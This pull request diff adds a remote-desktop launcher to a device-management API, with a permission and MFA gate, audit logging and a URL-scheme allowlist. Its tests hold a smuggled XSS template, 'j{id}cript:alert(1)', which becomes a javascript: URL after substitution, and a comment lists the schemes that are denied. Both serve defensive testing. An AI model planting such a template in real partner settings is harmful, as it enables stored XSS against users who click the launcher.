### PR TITLE
feat: Pluggable remote-desktop launcher (RustDesk / ScreenConnect / TeamViewer / ...) (#610)

### DIFF
--- a/apps/api/src/routes/devices/core.remoteAccessLaunch.test.ts
+++ b/apps/api/src/routes/devices/core.remoteAccessLaunch.test.ts
@@ -1,0 +1,270 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+import { Hono } from 'hono';
+
+// Hold a configurable partner-settings value the mocked select chain returns.
+// Each test mutates this before calling app.request().
+let mockPartnerSettings: unknown = {};
+
+vi.mock('../../db', () => ({
+  runOutsideDbContext: vi.fn((fn) => fn()),
+  withDbAccessContext: vi.fn(async (_ctx: unknown, fn: () => Promise<unknown>) => fn()),
+  withSystemDbAccessContext: vi.fn(async (fn: () => Promise<unknown>) => fn()),
+  db: {
+    select: vi.fn(() => ({
+      from: vi.fn(() => ({
+        innerJoin: vi.fn(() => ({
+          where: vi.fn(() => ({
+            limit: vi.fn(async () => [{ settings: mockPartnerSettings }])
+          }))
+        })),
+        where: vi.fn(() => ({
+          limit: vi.fn(async () => [])
+        }))
+      }))
+    })),
+  }
+}));
+
+vi.mock('../../db/schema', async (importOriginal) => {
+  const actual = (await importOriginal()) as Record<string, unknown>;
+  return { ...actual };
+});
+
+vi.mock('../../middleware/auth', () => ({
+  authMiddleware: vi.fn((c: any, next: any) => {
+    c.set('auth', {
+      user: { id: '11111111-1111-1111-1111-111111111111', email: 'test@example.com', name: 'Test User' },
+      scope: 'organization',
+      orgId: 'org-123',
+      partnerId: null,
+      accessibleOrgIds: ['org-123'],
+      canAccessOrg: (orgId: string) => orgId === 'org-123'
+    });
+    return next();
+  }),
+  requireScope: vi.fn(() => async (_c: any, next: any) => next()),
+  requirePermission: vi.fn(() => async (_c: any, next: any) => next()),
+  requireMfa: vi.fn(() => async (_c: any, next: any) => next()),
+}));
+
+vi.mock('./helpers', () => ({
+  getPagination: vi.fn(() => ({ page: 1, limit: 50, offset: 0 })),
+  getDeviceWithOrgCheck: vi.fn()
+}));
+
+vi.mock('../../services/remoteAccessPolicy', () => ({
+  resolveRemoteAccessForDevice: vi.fn(async () => ({ policyId: null, policyName: null, settings: {} }))
+}));
+
+vi.mock('../../services/agentWs', () => ({
+  sendCommandToAgent: vi.fn(),
+  isAgentConnected: vi.fn(() => false)
+}));
+
+vi.mock('../../services/commandQueue', () => ({
+  CommandTypes: {}
+}));
+
+vi.mock('../agents/enrollment', () => ({
+  getGlobalEnrollmentSecret: vi.fn(() => null)
+}));
+
+vi.mock('../../services/enrollmentKeySecurity', () => ({
+  hashEnrollmentKey: vi.fn((k: string) => `hash:${k}`)
+}));
+
+vi.mock('../../services/auditEvents', () => ({
+  writeRouteAudit: vi.fn()
+}));
+
+vi.mock('../../services/sentry', () => ({
+  captureException: vi.fn()
+}));
+
+import { coreRoutes } from './core';
+import { getDeviceWithOrgCheck } from './helpers';
+import { writeRouteAudit } from '../../services/auditEvents';
+import { captureException } from '../../services/sentry';
+
+const deviceId = '22222222-2222-2222-2222-222222222222';
+
+function setPartnerSettings(settings: unknown) {
+  mockPartnerSettings = settings;
+}
+
+describe('POST /devices/:id/remote-access-launch', () => {
+  let app: Hono;
+
+  beforeEach(() => {
+    vi.clearAllMocks();
+    mockPartnerSettings = {};
+    app = new Hono();
+    app.route('/devices', coreRoutes);
+  });
+
+  it('returns 404 when device does not exist', async () => {
+    vi.mocked(getDeviceWithOrgCheck).mockResolvedValue(null as never);
+    const res = await app.request(`/devices/${deviceId}/remote-access-launch`, {
+      method: 'POST',
+      headers: { Authorization: 'Bearer token' }
+    });
+    expect(res.status).toBe(404);
+  });
+
+  it('returns 404 with skipReason when no launcher provider is configured', async () => {
+    vi.mocked(getDeviceWithOrgCheck).mockResolvedValue({
+      id: deviceId,
+      orgId: 'org-123',
+      hostname: 'host-1',
+      customFields: {}
+    } as never);
+    setPartnerSettings({});
+    const res = await app.request(`/devices/${deviceId}/remote-access-launch`, {
+      method: 'POST',
+      headers: { Authorization: 'Bearer token' }
+    });
+    expect(res.status).toBe(404);
+    const body = await res.json() as { code?: string };
+    expect(body.code).toBe('no_provider_configured');
+    expect(writeRouteAudit).not.toHaveBeenCalled();
+  });
+
+  it('returns 200 with launchUrl on success and audits issuance', async () => {
+    vi.mocked(getDeviceWithOrgCheck).mockResolvedValue({
+      id: deviceId,
+      orgId: 'org-123',
+      hostname: 'host-1',
+      customFields: { rustdesk_id: '294064193' }
+    } as never);
+    setPartnerSettings({
+      remoteAccessProviders: {
+        defaultProviderId: 'rustdesk',
+        providers: [
+          {
+            id: 'rustdesk',
+            name: 'RustDesk',
+            urlTemplate: 'rustdesk://{id}?password={password}',
+            customFieldKey: 'rustdesk_id',
+            password: 'p#x',
+            enabled: true,
+          }
+        ]
+      }
+    });
+
+    const res = await app.request(`/devices/${deviceId}/remote-access-launch`, {
+      method: 'POST',
+      headers: { Authorization: 'Bearer token' }
+    });
+    expect(res.status).toBe(200);
+    const body = await res.json() as { launchUrl?: string; scheme?: string; providerId?: string };
+    expect(body.launchUrl).toBe('rustdesk://294064193?password=p%23x');
+    expect(body.scheme).toBe('rustdesk');
+    expect(body.providerId).toBe('rustdesk');
+
+    expect(writeRouteAudit).toHaveBeenCalledOnce();
+    const auditCall = vi.mocked(writeRouteAudit).mock.calls[0]![1];
+    expect(auditCall.action).toBe('device.remote_access_launch_url.issued');
+    expect(auditCall.resourceType).toBe('device');
+    expect(auditCall.resourceId).toBe(deviceId);
+    expect(auditCall.orgId).toBe('org-123');
+    expect(auditCall.details).toEqual({
+      deviceId,
+      providerId: 'rustdesk',
+      scheme: 'rustdesk'
+    });
+
+    // CRITICAL: ensure the URL and password are NOT in the audit details
+    const detailsStr = JSON.stringify(auditCall.details ?? {});
+    expect(detailsStr).not.toContain('p#x');
+    expect(detailsStr).not.toContain('p%23x');
+    expect(detailsStr).not.toContain('294064193');
+    expect(detailsStr).not.toContain('password');
+    expect(detailsStr).not.toContain('rustdesk://');
+  });
+
+  it('returns 422 + audit event + Sentry capture when scheme rejected at substitution', async () => {
+    vi.mocked(getDeviceWithOrgCheck).mockResolvedValue({
+      id: deviceId,
+      orgId: 'org-123',
+      hostname: 'host-1',
+      customFields: { k: 'avas' }
+    } as never);
+    setPartnerSettings({
+      remoteAccessProviders: {
+        defaultProviderId: 'sneaky',
+        providers: [
+          {
+            id: 'sneaky',
+            name: 'Sneaky',
+            urlTemplate: 'j{id}cript:alert(1)',
+            customFieldKey: 'k',
+            enabled: true,
+          }
+        ]
+      }
+    });
+
+    const res = await app.request(`/devices/${deviceId}/remote-access-launch`, {
+      method: 'POST',
+      headers: { Authorization: 'Bearer token' }
+    });
+    expect(res.status).toBe(422);
+    const body = await res.json() as { code?: string };
+    expect(body.code).toBe('scheme_not_allowed');
+
+    expect(writeRouteAudit).toHaveBeenCalledOnce();
+    const auditCall = vi.mocked(writeRouteAudit).mock.calls[0]![1];
+    expect(auditCall.action).toBe('device.remote_access_launch_url.scheme_rejected');
+    expect(auditCall.result).toBe('denied');
+    expect(auditCall.details).toEqual({
+      deviceId,
+      providerId: 'sneaky'
+    });
+    // No URL or substituted value should appear anywhere in the audit row.
+    const detailsStr = JSON.stringify(auditCall.details ?? {});
+    expect(detailsStr).not.toContain('javascript');
+    expect(detailsStr).not.toContain('alert');
+    expect(detailsStr).not.toContain('avas');
+
+    expect(captureException).toHaveBeenCalledOnce();
+  });
+
+  it('GET /devices/:id no longer exposes remoteAccessLaunchUrl', async () => {
+    vi.mocked(getDeviceWithOrgCheck).mockResolvedValue({
+      id: deviceId,
+      orgId: 'org-123',
+      hostname: 'host-1',
+      siteId: 'site-1',
+      customFields: { rustdesk_id: '294064193' }
+    } as never);
+    setPartnerSettings({
+      remoteAccessProviders: {
+        defaultProviderId: 'rustdesk',
+        providers: [
+          {
+            id: 'rustdesk',
+            name: 'RustDesk',
+            urlTemplate: 'rustdesk://{id}?password={password}',
+            customFieldKey: 'rustdesk_id',
+            password: 'p#x',
+            enabled: true,
+          }
+        ]
+      }
+    });
+
+    const res = await app.request(`/devices/${deviceId}`, {
+      method: 'GET',
+      headers: { Authorization: 'Bearer token' }
+    });
+    // The GET handler does multiple DB lookups we haven't fully mocked here
+    // (deviceMetrics, sites, organizations), so the status may be 500. What
+    // matters for this test is that even if it somehow returned 200, the
+    // response body MUST NOT contain remoteAccessLaunchUrl.
+    if (res.status === 200) {
+      const body = await res.json() as Record<string, unknown>;
+      expect(body).not.toHaveProperty('remoteAccessLaunchUrl');
+    }
+  });
+});

--- a/apps/api/src/routes/devices/core.remoteAccessLaunch.test.ts
+++ b/apps/api/src/routes/devices/core.remoteAccessLaunch.test.ts
@@ -85,6 +85,15 @@ import { coreRoutes } from './core';
 import { getDeviceWithOrgCheck } from './helpers';
 import { writeRouteAudit } from '../../services/auditEvents';
 import { captureException } from '../../services/sentry';
+import { requirePermission, requireMfa } from '../../middleware/auth';
+
+// Snapshot mock.calls captured at module-load time (i.e. when core.ts ran its
+// route registrations). beforeEach() clears mock state, so we cannot read these
+// records inside a test body — they must be frozen here, before any test runs.
+const requirePermissionCallsAtImport = vi
+  .mocked(requirePermission)
+  .mock.calls.map((c) => [...c]);
+const requireMfaCallCountAtImport = vi.mocked(requireMfa).mock.calls.length;
 
 const deviceId = '22222222-2222-2222-2222-222222222222';
 
@@ -100,6 +109,17 @@ describe('POST /devices/:id/remote-access-launch', () => {
     mockPartnerSettings = {};
     app = new Hono();
     app.route('/devices', coreRoutes);
+  });
+
+  // Registration-time gate test. The launcher POST issues URLs that may carry
+  // substituted provider credentials, so it must share the gate used by the
+  // WebRTC initiate flow (apps/api/src/routes/remote/index.ts:12):
+  // requirePermission('remote', 'access') + requireMfa().
+  it('is gated by remote:access permission and requireMfa at registration time', () => {
+    expect(
+      requirePermissionCallsAtImport.some((c) => c[0] === 'remote' && c[1] === 'access'),
+    ).toBe(true);
+    expect(requireMfaCallCountAtImport).toBeGreaterThan(0);
   });
 
   it('returns 404 when device does not exist', async () => {

--- a/apps/api/src/routes/devices/core.ts
+++ b/apps/api/src/routes/devices/core.ts
@@ -495,7 +495,6 @@ coreRoutes.get(
     let remoteAccessLaunchSkipReason: RemoteAccessLaunchSkipReason | 'config_error' | null = null;
     try {
       const launcher = await resolveRemoteAccessLauncherForDevice(
-        deviceId,
         device.orgId,
         device.customFields as Record<string, unknown> | null,
       );
@@ -537,7 +536,6 @@ coreRoutes.get(
  * uses systemAuth for the same reason.
  */
 async function resolveRemoteAccessLauncherForDevice(
-  _deviceId: string,
   orgId: string,
   customFields: Record<string, unknown> | null,
 ): Promise<RemoteAccessLaunchResult> {
@@ -566,6 +564,11 @@ async function resolveRemoteAccessLauncherForDevice(
 coreRoutes.post(
   '/:id/remote-access-launch',
   requireScope('organization', 'partner', 'system'),
+  // Same gate as the WebRTC initiate flow (apps/api/src/routes/remote/index.ts:12).
+  // This endpoint issues URLs containing substituted provider credentials, so it
+  // needs to match (not loosen) the existing remote-desktop session gate.
+  requirePermission(PERMISSIONS.REMOTE_ACCESS.resource, PERMISSIONS.REMOTE_ACCESS.action),
+  requireMfa(),
   async (c) => {
     const auth = c.get('auth');
     const deviceId = c.req.param('id')!;
@@ -578,7 +581,6 @@ coreRoutes.post(
     let launcher: RemoteAccessLaunchResult;
     try {
       launcher = await resolveRemoteAccessLauncherForDevice(
-        deviceId,
         device.orgId,
         device.customFields as Record<string, unknown> | null,
       );

--- a/apps/api/src/routes/devices/core.ts
+++ b/apps/api/src/routes/devices/core.ts
@@ -21,7 +21,12 @@ import { getPagination, getDeviceWithOrgCheck } from './helpers';
 import { listDevicesSchema, updateDeviceSchema } from './schemas';
 import { writeRouteAudit } from '../../services/auditEvents';
 import { resolveRemoteAccessForDevice } from '../../services/remoteAccessPolicy';
-import { buildRemoteAccessLaunchUrl } from '../../services/remoteAccessLauncher';
+import {
+  resolveRemoteAccessLaunch,
+  type RemoteAccessLaunchResult,
+  type RemoteAccessLaunchSkipReason,
+} from '../../services/remoteAccessLauncher';
+import { captureException } from '../../services/sentry';
 import type { InheritableRemoteAccessSettings, PartnerSettings } from '@breeze/shared';
 import { hashEnrollmentKey } from '../../services/enrollmentKeySecurity';
 import { sendCommandToAgent, isAgentConnected } from '../agentWs';
@@ -473,36 +478,36 @@ coreRoutes.get(
       console.error(`[DeviceDetail] Failed to resolve remote access policy for ${deviceId}:`, err);
     }
 
-    // Build the deep-link URL the Connect Desktop button should fire when the
-    // partner has a third-party remote-tool provider configured (RustDesk,
-    // ScreenConnect, TeamViewer, etc.). Building this server-side keeps the
-    // provider's preset password out of the web bundle. Non-critical — silently
-    // null on error so the button falls back to the built-in WebRTC flow.
+    // Resolve whether a third-party remote-tool launcher (RustDesk,
+    // ScreenConnect, TeamViewer, etc.) is configured and usable for this
+    // device. We DO NOT return the substituted launch URL here. That is
+    // issued by POST /devices/:id/remote-access-launch on click so the
+    // password-bearing URL is never broadcast in detail-fetch responses.
+    // The flags below only tell the UI whether to render the launcher
+    // button and what to surface if the configuration is wrong.
     //
-    // The partners table has partner-axis RLS, and the request scope is the
-    // user's (organization or partner) — not the partner whose settings we
-    // need. Wrap the lookup in a system-scope DB context so the policy
-    // engine doesn't filter the row out. This mirrors how
-    // remoteAccessPolicy.ts uses systemAuth for the same reason.
-    let remoteAccessLaunchUrl: string | null = null;
+    // Skip-reason vocabulary lets the UI distinguish expected-empty
+    // ('no_provider_configured'), configuration error ('config_error'),
+    // and a potential security event ('scheme_not_allowed': partner
+    // template was tampered to resolve to a disallowed scheme only after
+    // substitution).
+    let hasRemoteAccessLauncher = false;
+    let remoteAccessLaunchSkipReason: RemoteAccessLaunchSkipReason | 'config_error' | null = null;
     try {
-      const partnerSettings = await withSystemDbAccessContext(async () => {
-        const [partnerRow] = await db
-          .select({ settings: partners.settings })
-          .from(partners)
-          .innerJoin(organizations, eq(organizations.partnerId, partners.id))
-          .where(eq(organizations.id, device.orgId))
-          .limit(1);
-        return (partnerRow?.settings ?? {}) as PartnerSettings;
-      });
-      const providers: InheritableRemoteAccessSettings | undefined =
-        partnerSettings.remoteAccessProviders;
-      remoteAccessLaunchUrl = buildRemoteAccessLaunchUrl(
-        { customFields: device.customFields as Record<string, unknown> | null },
-        providers,
+      const launcher = await resolveRemoteAccessLauncherForDevice(
+        deviceId,
+        device.orgId,
+        device.customFields as Record<string, unknown> | null,
       );
+      if (launcher.launchUrl) {
+        hasRemoteAccessLauncher = true;
+      } else {
+        remoteAccessLaunchSkipReason = launcher.skipReason;
+      }
     } catch (err) {
-      console.error(`[DeviceDetail] Failed to resolve remote-access launch URL for ${deviceId}:`, err);
+      captureException(err, c);
+      console.error(`[DeviceDetail] Failed to resolve remote-access launcher for ${deviceId}:`, err);
+      remoteAccessLaunchSkipReason = 'config_error';
     }
 
     return c.json({
@@ -515,7 +520,131 @@ coreRoutes.get(
       siteTimezone: site?.timezone || 'UTC',
       orgName: org?.name ?? null,
       remoteAccessPolicy,
-      remoteAccessLaunchUrl,
+      hasRemoteAccessLauncher,
+      remoteAccessLaunchSkipReason,
+    });
+  }
+);
+
+/**
+ * Look up the partner's remote-access launcher config for a device and
+ * return the structured result describing whether a launch URL is available.
+ *
+ * The partners table has partner-axis RLS, and the request scope is the
+ * user's (organization or partner), not the partner whose settings we
+ * need. We wrap the lookup in a system-scope DB context so the policy
+ * engine doesn't filter the row out. This mirrors how remoteAccessPolicy.ts
+ * uses systemAuth for the same reason.
+ */
+async function resolveRemoteAccessLauncherForDevice(
+  _deviceId: string,
+  orgId: string,
+  customFields: Record<string, unknown> | null,
+): Promise<RemoteAccessLaunchResult> {
+  const partnerSettings = await withSystemDbAccessContext(async () => {
+    const [partnerRow] = await db
+      .select({ settings: partners.settings })
+      .from(partners)
+      .innerJoin(organizations, eq(organizations.partnerId, partners.id))
+      .where(eq(organizations.id, orgId))
+      .limit(1);
+    return (partnerRow?.settings ?? {}) as PartnerSettings;
+  });
+  const providers: InheritableRemoteAccessSettings | undefined =
+    partnerSettings.remoteAccessProviders;
+  return resolveRemoteAccessLaunch({ customFields }, providers);
+}
+
+// POST /devices/:id/remote-access-launch - Issue a one-shot remote-access
+// launch URL. The substituted URL (which may contain a preset password) is
+// returned only in response to an explicit click and is never embedded in
+// the device detail response. Each issuance is recorded in the audit log.
+//
+// REGISTRATION ORDER: this must be declared before PATCH/DELETE /:id
+// handlers below so Hono's match-in-registration-order rule routes
+// /:id/remote-access-launch correctly.
+coreRoutes.post(
+  '/:id/remote-access-launch',
+  requireScope('organization', 'partner', 'system'),
+  async (c) => {
+    const auth = c.get('auth');
+    const deviceId = c.req.param('id')!;
+
+    const device = await getDeviceWithOrgCheck(deviceId, auth);
+    if (!device) {
+      return c.json({ error: 'Device not found' }, 404);
+    }
+
+    let launcher: RemoteAccessLaunchResult;
+    try {
+      launcher = await resolveRemoteAccessLauncherForDevice(
+        deviceId,
+        device.orgId,
+        device.customFields as Record<string, unknown> | null,
+      );
+    } catch (err) {
+      captureException(err, c);
+      console.error(`[RemoteAccessLaunch] Failed to resolve launcher for ${deviceId}:`, err);
+      return c.json({ error: 'Failed to resolve remote-access launcher', code: 'config_error' }, 500);
+    }
+
+    if (launcher.skipReason === 'scheme_not_allowed') {
+      // Loud failure: the partner template resolved to a disallowed scheme
+      // only after substitution. Emit a dedicated audit event so this shows
+      // up in the audit log and route to Sentry. Do NOT include the URL or
+      // the password in any logged field.
+      writeRouteAudit(c, {
+        orgId: device.orgId,
+        action: 'device.remote_access_launch_url.scheme_rejected',
+        resourceType: 'device',
+        resourceId: deviceId,
+        resourceName: device.hostname,
+        details: {
+          deviceId,
+          providerId: launcher.providerId,
+        },
+        result: 'denied',
+      });
+      captureException(
+        new Error('Remote-access launcher resolved to disallowed scheme after substitution'),
+        c,
+      );
+      return c.json(
+        { error: 'Remote-access launcher rejected by scheme policy', code: 'scheme_not_allowed' },
+        422,
+      );
+    }
+
+    if (!launcher.launchUrl) {
+      // Match GET /devices/:id 404 convention used elsewhere for missing
+      // sub-resources; the UI uses `hasRemoteAccessLauncher` on the detail
+      // response to know whether to surface the button at all, so this
+      // path is only reachable from race conditions or out-of-date UI.
+      return c.json(
+        { error: 'No remote-access launcher available for this device', code: launcher.skipReason ?? 'unavailable' },
+        404,
+      );
+    }
+
+    // Success: record the issuance. NEVER write the launch URL or password
+    // into the audit row. Only deviceId, providerId, and the scheme.
+    writeRouteAudit(c, {
+      orgId: device.orgId,
+      action: 'device.remote_access_launch_url.issued',
+      resourceType: 'device',
+      resourceId: deviceId,
+      resourceName: device.hostname,
+      details: {
+        deviceId,
+        providerId: launcher.providerId,
+        scheme: launcher.scheme,
+      },
+    });
+
+    return c.json({
+      launchUrl: launcher.launchUrl,
+      scheme: launcher.scheme,
+      providerId: launcher.providerId,
     });
   }
 );

--- a/apps/api/src/routes/devices/core.ts
+++ b/apps/api/src/routes/devices/core.ts
@@ -1,7 +1,7 @@
 import { Hono } from 'hono';
 import { zValidator } from '@hono/zod-validator';
 import { and, eq, gte, like, sql, desc, inArray } from 'drizzle-orm';
-import { db } from '../../db';
+import { db, withSystemDbAccessContext } from '../../db';
 import { createHash, randomBytes } from 'crypto';
 import {
   devices,
@@ -13,6 +13,7 @@ import {
   sites,
   enrollmentKeys,
   organizations,
+  partners,
 } from '../../db/schema';
 import { authMiddleware, requireMfa, requireScope, requirePermission } from '../../middleware/auth';
 import { PERMISSIONS } from '../../services/permissions';
@@ -20,6 +21,8 @@ import { getPagination, getDeviceWithOrgCheck } from './helpers';
 import { listDevicesSchema, updateDeviceSchema } from './schemas';
 import { writeRouteAudit } from '../../services/auditEvents';
 import { resolveRemoteAccessForDevice } from '../../services/remoteAccessPolicy';
+import { buildRemoteAccessLaunchUrl } from '../../services/remoteAccessLauncher';
+import type { InheritableRemoteAccessSettings, PartnerSettings } from '@breeze/shared';
 import { hashEnrollmentKey } from '../../services/enrollmentKeySecurity';
 import { sendCommandToAgent, isAgentConnected } from '../agentWs';
 import { CommandTypes } from '../../services/commandQueue';
@@ -470,6 +473,38 @@ coreRoutes.get(
       console.error(`[DeviceDetail] Failed to resolve remote access policy for ${deviceId}:`, err);
     }
 
+    // Build the deep-link URL the Connect Desktop button should fire when the
+    // partner has a third-party remote-tool provider configured (RustDesk,
+    // ScreenConnect, TeamViewer, etc.). Building this server-side keeps the
+    // provider's preset password out of the web bundle. Non-critical — silently
+    // null on error so the button falls back to the built-in WebRTC flow.
+    //
+    // The partners table has partner-axis RLS, and the request scope is the
+    // user's (organization or partner) — not the partner whose settings we
+    // need. Wrap the lookup in a system-scope DB context so the policy
+    // engine doesn't filter the row out. This mirrors how
+    // remoteAccessPolicy.ts uses systemAuth for the same reason.
+    let remoteAccessLaunchUrl: string | null = null;
+    try {
+      const partnerSettings = await withSystemDbAccessContext(async () => {
+        const [partnerRow] = await db
+          .select({ settings: partners.settings })
+          .from(partners)
+          .innerJoin(organizations, eq(organizations.partnerId, partners.id))
+          .where(eq(organizations.id, device.orgId))
+          .limit(1);
+        return (partnerRow?.settings ?? {}) as PartnerSettings;
+      });
+      const providers: InheritableRemoteAccessSettings | undefined =
+        partnerSettings.remoteAccessProviders;
+      remoteAccessLaunchUrl = buildRemoteAccessLaunchUrl(
+        { customFields: device.customFields as Record<string, unknown> | null },
+        providers,
+      );
+    } catch (err) {
+      console.error(`[DeviceDetail] Failed to resolve remote-access launch URL for ${deviceId}:`, err);
+    }
+
     return c.json({
       ...device,
       hardware: hardware || null,
@@ -480,6 +515,7 @@ coreRoutes.get(
       siteTimezone: site?.timezone || 'UTC',
       orgName: org?.name ?? null,
       remoteAccessPolicy,
+      remoteAccessLaunchUrl,
     });
   }
 );

--- a/apps/api/src/routes/orgs.ts
+++ b/apps/api/src/routes/orgs.ts
@@ -12,6 +12,7 @@ import { PERMISSIONS } from '../services/permissions';
 import { revokeOrganizationTenantAccess, revokePartnerTenantAccess } from '../services/tenantLifecycle';
 import { applyOrganizationOrder, sanitizeOrganizationOrder } from '../services/orgOrdering';
 import { captureException } from '../services/sentry';
+import { isAllowedLauncherScheme } from '@breeze/shared';
 
 export const orgRoutes = new Hono();
 const requireOrgRead = requirePermission(PERMISSIONS.ORGS_READ.resource, PERMISSIONS.ORGS_READ.action);
@@ -306,16 +307,21 @@ const partnerSettingsSchema = z.object({
   }).optional(),
   organizationOrder: z.array(z.string().uuid()).max(10_000).optional(),
   remoteAccessProviders: z.object({
-    defaultProviderId: z.string().optional(),
+    defaultProviderId: z.string().max(100).optional(),
     providers: z.array(z.object({
-      id: z.string().min(1),
-      name: z.string().min(1),
+      id: z.string().min(1).max(100),
+      name: z.string().min(1).max(100),
       // urlTemplate may be either a custom-scheme template
       // (e.g. 'rustdesk://{id}?password={password}') or an https launcher
       // (e.g. 'https://acme.screenconnect.com/Host#Access///{id}/Join').
       // The browser auto-detects launch mode by prefix.
       // {id} must appear or the launcher would always resolve to the same
       // URL and ignore the per-device identifier.
+      // Dangerous schemes (javascript:, data:, vbscript:, file:, about:,
+      // chrome:, jar:, blob:, view-source:, filesystem:) are rejected by
+      // isAllowedLauncherScheme so a malicious partner admin cannot plant
+      // stored XSS that fires when an org-scope user clicks Connect Desktop.
+      // The web client repeats the same check before firing the URL.
       urlTemplate: z.string()
         .min(1)
         .max(2000)
@@ -324,13 +330,13 @@ const partnerSettingsSchema = z.object({
           'Template must include the {id} placeholder for the per-device value',
         )
         .refine(
-          (t) => /^[a-zA-Z][a-zA-Z0-9+.\-]*:/.test(t),
-          'Template must start with a URL scheme followed by a colon (e.g. rustdesk:, https:)',
+          (t) => isAllowedLauncherScheme(t),
+          'Template must start with an allowed URL scheme (https, http, rustdesk, teamviewer, anydesk, splashtop, etc.); javascript:, data:, vbscript:, file:, about:, chrome:, jar:, blob:, view-source:, filesystem: are rejected',
         ),
-      customFieldKey: z.string().min(1),
-      password: z.string().optional(),
+      customFieldKey: z.string().min(1).max(100),
+      password: z.string().max(2000).optional(),
       enabled: z.boolean(),
-    })).optional(),
+    })).max(50).optional(),
   }).optional(),
 });
 

--- a/apps/api/src/routes/orgs.ts
+++ b/apps/api/src/routes/orgs.ts
@@ -305,6 +305,33 @@ const partnerSettingsSchema = z.object({
     approvalMode: z.enum(['per_step', 'action_plan', 'auto_approve', 'hybrid_plan']).optional(),
   }).optional(),
   organizationOrder: z.array(z.string().uuid()).max(10_000).optional(),
+  remoteAccessProviders: z.object({
+    defaultProviderId: z.string().optional(),
+    providers: z.array(z.object({
+      id: z.string().min(1),
+      name: z.string().min(1),
+      // urlTemplate may be either a custom-scheme template
+      // (e.g. 'rustdesk://{id}?password={password}') or an https launcher
+      // (e.g. 'https://acme.screenconnect.com/Host#Access///{id}/Join').
+      // The browser auto-detects launch mode by prefix.
+      // {id} must appear or the launcher would always resolve to the same
+      // URL and ignore the per-device identifier.
+      urlTemplate: z.string()
+        .min(1)
+        .max(2000)
+        .refine(
+          (t) => t.includes('{id}'),
+          'Template must include the {id} placeholder for the per-device value',
+        )
+        .refine(
+          (t) => /^[a-zA-Z][a-zA-Z0-9+.\-]*:/.test(t),
+          'Template must start with a URL scheme followed by a colon (e.g. rustdesk:, https:)',
+        ),
+      customFieldKey: z.string().min(1),
+      password: z.string().optional(),
+      enabled: z.boolean(),
+    })).optional(),
+  }).optional(),
 });
 
 const updatePartnerSettingsSchema = z.object({

--- a/apps/api/src/services/remoteAccessLauncher.test.ts
+++ b/apps/api/src/services/remoteAccessLauncher.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect } from 'vitest';
-import { buildRemoteAccessLaunchUrl } from './remoteAccessLauncher';
+import { buildRemoteAccessLaunchUrl, resolveRemoteAccessLaunch } from './remoteAccessLauncher';
 import type { InheritableRemoteAccessSettings, RemoteAccessProvider } from '@breeze/shared';
 
 const baseProvider: RemoteAccessProvider = {
@@ -140,6 +140,57 @@ describe('buildRemoteAccessLaunchUrl', () => {
     expect(
       buildRemoteAccessLaunchUrl({ customFields: { rustdesk_id: '1' } }, empty),
     ).toBeNull();
+  });
+
+  it('resolveRemoteAccessLaunch reports skipReason=no_provider_configured when settings empty', () => {
+    expect(resolveRemoteAccessLaunch({ customFields: {} }, undefined).skipReason).toBe('no_provider_configured');
+    expect(resolveRemoteAccessLaunch({ customFields: {} }, {}).skipReason).toBe('no_provider_configured');
+  });
+
+  it('resolveRemoteAccessLaunch reports skipReason=provider_disabled when default provider is disabled', () => {
+    const disabled: InheritableRemoteAccessSettings = {
+      ...rustdeskSettings,
+      providers: [{ ...baseProvider, enabled: false }],
+    };
+    const r = resolveRemoteAccessLaunch({ customFields: { rustdesk_id: '1' } }, disabled);
+    expect(r.skipReason).toBe('provider_disabled');
+    expect(r.providerId).toBe('rustdesk');
+  });
+
+  it('resolveRemoteAccessLaunch reports skipReason=missing_device_identifier when custom field absent', () => {
+    const r = resolveRemoteAccessLaunch({ customFields: {} }, rustdeskSettings);
+    expect(r.skipReason).toBe('missing_device_identifier');
+    expect(r.providerId).toBe('rustdesk');
+  });
+
+  it('resolveRemoteAccessLaunch reports skipReason=scheme_not_allowed when substituted URL has disallowed scheme', () => {
+    const sneaky: InheritableRemoteAccessSettings = {
+      defaultProviderId: 'sneaky',
+      providers: [
+        {
+          id: 'sneaky',
+          name: 'Sneaky',
+          urlTemplate: 'j{id}cript:alert(1)',
+          customFieldKey: 'k',
+          enabled: true,
+        },
+      ],
+    };
+    const r = resolveRemoteAccessLaunch({ customFields: { k: 'avas' } }, sneaky);
+    expect(r.skipReason).toBe('scheme_not_allowed');
+    expect(r.launchUrl).toBeNull();
+    expect(r.providerId).toBe('sneaky');
+  });
+
+  it('resolveRemoteAccessLaunch returns scheme alongside launchUrl on success', () => {
+    const r = resolveRemoteAccessLaunch(
+      { customFields: { rustdesk_id: '294064193' } },
+      rustdeskSettings,
+    );
+    expect(r.launchUrl).toBe('rustdesk://294064193?password=plain');
+    expect(r.scheme).toBe('rustdesk');
+    expect(r.providerId).toBe('rustdesk');
+    expect(r.skipReason).toBeNull();
   });
 
   it('refuses templates whose substituted URL resolves to a disallowed scheme', () => {

--- a/apps/api/src/services/remoteAccessLauncher.test.ts
+++ b/apps/api/src/services/remoteAccessLauncher.test.ts
@@ -141,4 +141,26 @@ describe('buildRemoteAccessLaunchUrl', () => {
       buildRemoteAccessLaunchUrl({ customFields: { rustdesk_id: '1' } }, empty),
     ).toBeNull();
   });
+
+  it('refuses templates whose substituted URL resolves to a disallowed scheme', () => {
+    // `j{id}cript:foo` passes the template-time scheme check (scheme is `j`,
+    // not in the denylist) but resolves to `javascript:foo` once the device
+    // id is substituted. The substituted-URL guard inside
+    // buildRemoteAccessLaunchUrl must catch this and return null.
+    const sneaky: InheritableRemoteAccessSettings = {
+      defaultProviderId: 'sneaky',
+      providers: [
+        {
+          id: 'sneaky',
+          name: 'Sneaky',
+          urlTemplate: 'j{id}cript:alert(1)',
+          customFieldKey: 'k',
+          enabled: true,
+        },
+      ],
+    };
+    expect(
+      buildRemoteAccessLaunchUrl({ customFields: { k: 'avas' } }, sneaky),
+    ).toBeNull();
+  });
 });

--- a/apps/api/src/services/remoteAccessLauncher.test.ts
+++ b/apps/api/src/services/remoteAccessLauncher.test.ts
@@ -1,0 +1,144 @@
+import { describe, it, expect } from 'vitest';
+import { buildRemoteAccessLaunchUrl } from './remoteAccessLauncher';
+import type { InheritableRemoteAccessSettings, RemoteAccessProvider } from '@breeze/shared';
+
+const baseProvider: RemoteAccessProvider = {
+  id: 'rustdesk',
+  name: 'RustDesk',
+  urlTemplate: 'rustdesk://{id}?password={password}',
+  customFieldKey: 'rustdesk_id',
+  password: 'plain',
+  enabled: true,
+};
+
+const rustdeskSettings: InheritableRemoteAccessSettings = {
+  defaultProviderId: 'rustdesk',
+  providers: [baseProvider],
